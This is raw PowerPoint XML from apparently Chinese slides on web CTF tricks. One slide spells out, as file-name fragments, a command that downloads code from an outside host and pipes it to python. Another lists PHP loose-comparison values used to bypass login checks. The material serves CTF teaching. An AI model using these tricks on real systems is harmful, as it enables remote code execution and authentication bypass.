          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>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A9239BB8-231A-A745-B1A2-ED10970E54A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3947160" y="2383550"/>
            <a:ext cx="990600" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;\;\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;on\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;th\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;py\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;\|\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;tw\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;e.\</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B140FE1A-5F7C-014E-B455-1391354E7CAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6842760" y="2487170"/>
            <a:ext cx="990600" cy="2739211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;ng\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;ra\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;o\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;\\</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;rl\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;cu\</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28577618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7152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387" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>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791510" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2368683" y="2376627"/>
            <a:ext cx="1762771" cy="1641349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="10665" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="10665" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="10665">
              <a:solidFill>
                <a:srgbClr val="17307F"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="矩形 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4246630" y="2827969"/>
            <a:ext cx="6177530" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="4800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="4800" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="4800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="4800" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> 中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="4800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>trick</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="17307F"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15144707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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="4*#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>弱类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E7A3C5D-0379-DD4F-ABF9-14D0B41B9EF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1837361"/>
            <a:ext cx="8610600" cy="4368312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>""==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//true</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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1admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//true</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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0e123456</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0e4456789</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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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0x1e240</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123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//true</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="777777"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</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0e4456789</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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]==[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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0x1e240</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123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//true</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="777777"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
